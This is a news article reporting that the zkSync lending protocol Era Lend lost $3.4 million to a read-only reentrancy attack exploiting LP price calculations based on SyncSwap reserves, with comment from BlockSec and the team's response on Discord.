Era Lend, a prominent decentralized lending protocol operating on the zkSync Layer 2 network, has fallen prey to a reentrancy attack, leading to a loss of $3.4 million. This unfortunate event was confirmed by BlockSec’s security analysts.

The attacker exploited a read-only reentrancy vulnerability, which enabled them to make repeated calls within a single transaction, thereby withdrawing more funds than they were entitled to. The attacker manipulated a faulty price oracle that Era Lend relied on, using the reentrancy exploit to further drain assets from the protocol.

Generally, view functions labeled as read-only are deemed safe as they don’t alter the contract’s state and often lack reentrancy protection. These functions usually perform a view action, such as calculating a token balance based on a third-party pool’s supply. In this case, the third-party was another decentralized exchange, SyncSwap. However, this incident illustrates that these functions can be manipulated to drain substantial funds.

Lei Wu, co-founder and CTO of BlockSec, explained to The Block, “The attacker altered the LP’s price during the burn/mint actions of SyncSwap, using its reserves to determine the LP price [on Era Lend]. All projects that utilize the SyncSwap code should remain alert.”

In response to the attack, Era Lend issued a statement on Discord, “We have detected and confirmed a cyber attack on our platform. We want to assure you that the attack has been contained, and the threat actor can no longer continue their actions.” The team clarified that only the USDC pool was compromised, and the security of other assets remains intact.

As a safety measure, the team advised users to avoid depositing USDC for now. Furthermore, borrowing operations on the platform have been temporarily suspended.